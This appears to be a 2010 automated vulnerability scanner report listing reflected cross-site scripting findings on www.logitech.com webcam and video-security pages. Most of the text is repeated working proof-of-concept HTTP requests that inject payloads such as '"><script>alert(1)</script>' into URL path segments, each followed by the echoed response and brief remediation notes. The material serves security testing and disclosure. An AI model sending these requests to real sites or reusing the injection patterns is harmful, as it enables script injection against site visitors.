<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e319</script><script>alert(1)</script>0c9706c7a71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1e319</script><script>alert(1)</script>0c9706c7a71/webcam-communications/video-security-systems/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98148</script><script>alert(1)</script>947a3eda2a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications98148</script><script>alert(1)</script>947a3eda2a1/video-security-systems/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48de7"><script>alert(1)</script>8eda284a4da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/webcam-communications48de7"><script>alert(1)</script>8eda284a4da/video-security-systems/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bbb9</script><script>alert(1)</script>5fedd9cd3cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems9bbb9</script><script>alert(1)</script>5fedd9cd3cc/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d80c"><script>alert(1)</script>0c25c97feca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/webcam-communications/video-security-systems4d80c"><script>alert(1)</script>0c25c97feca/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4f6</script><script>alert(1)</script>c363ed65f3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5a4f6</script><script>alert(1)</script>c363ed65f3e/webcam-communications/video-security-systems/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
<m ...[SNIP]... <script type="text/javascript" language="javascript1.1"> function multitrack_tabs(parm) { dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','5a4f6</script><script>alert(1)</script>c363ed65f3e/webcam-communications/video-security-systems/add-on-cameras' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm); } function multitrack_popup(parm1,parm2) {
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4681"><script>alert(1)</script>d46ca1fc8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usb4681"><script>alert(1)</script>d46ca1fc8d/webcam-communications/video-security-systems/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27af1"><script>alert(1)</script>bf886beb25c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications27af1"><script>alert(1)</script>bf886beb25c/video-security-systems/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b244</script><script>alert(1)</script>732791e5412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications4b244</script><script>alert(1)</script>732791e5412/video-security-systems/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3763"><script>alert(1)</script>e803a6ab77b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systemsa3763"><script>alert(1)</script>e803a6ab77b/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dacd9</script><script>alert(1)</script>af690cbac93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systemsdacd9</script><script>alert(1)</script>af690cbac93/add-on-cameras HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490ee"><script>alert(1)</script>913d069ec25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems/add-on-cameras490ee"><script>alert(1)</script>913d069ec25 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5ae5</script><script>alert(1)</script>de8c034357f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems/add-on-camerasa5ae5</script><script>alert(1)</script>de8c034357f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd285</script><script>alert(1)</script>4042b692dd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bd285</script><script>alert(1)</script>4042b692dd6/webcam-communications/video-security-systems/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
<m ...[SNIP]... <script type="text/javascript" language="javascript1.1"> function multitrack_tabs(parm) { dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','bd285</script><script>alert(1)</script>4042b692dd6/webcam-communications/video-security-systems/master-systems' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm); } function multitrack_popup(parm1,parm2) {
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 468b6"><script>alert(1)</script>38822b41138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us468b6"><script>alert(1)</script>38822b41138/webcam-communications/video-security-systems/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6887"><script>alert(1)</script>a379709ff57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communicationsc6887"><script>alert(1)</script>a379709ff57/video-security-systems/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3ee</script><script>alert(1)</script>a47cb63ef72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communicationsea3ee</script><script>alert(1)</script>a47cb63ef72/video-security-systems/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 679c5</script><script>alert(1)</script>527587ea1f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems679c5</script><script>alert(1)</script>527587ea1f2/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390a4"><script>alert(1)</script>10e6772384 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems390a4"><script>alert(1)</script>10e6772384/master-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b7bf</script><script>alert(1)</script>102bf470164 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems/master-systems9b7bf</script><script>alert(1)</script>102bf470164 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d829"><script>alert(1)</script>0d6e902f6a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems/master-systems4d829"><script>alert(1)</script>0d6e902f6a0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 223b7</script><script>alert(1)</script>c6430cf30af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /223b7</script><script>alert(1)</script>c6430cf30af/webcam-communications/video-security-systems/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
<m ...[SNIP]... <script type="text/javascript" language="javascript1.1"> function multitrack_tabs(parm) { dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','223b7</script><script>alert(1)</script>c6430cf30af/webcam-communications/video-security-systems/monitoring-services' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm); } function multitrack_popup(parm1,parm2 ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 530bf"><script>alert(1)</script>3def2808a4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us530bf"><script>alert(1)</script>3def2808a4f/webcam-communications/video-security-systems/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4ccd</script><script>alert(1)</script>768db28d3fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communicationse4ccd</script><script>alert(1)</script>768db28d3fd/video-security-systems/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f8cc"><script>alert(1)</script>b064580417a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications8f8cc"><script>alert(1)</script>b064580417a/video-security-systems/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7409</script><script>alert(1)</script>e42d43a59c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systemsc7409</script><script>alert(1)</script>e42d43a59c5/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 738ef"><script>alert(1)</script>7fae476ec20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
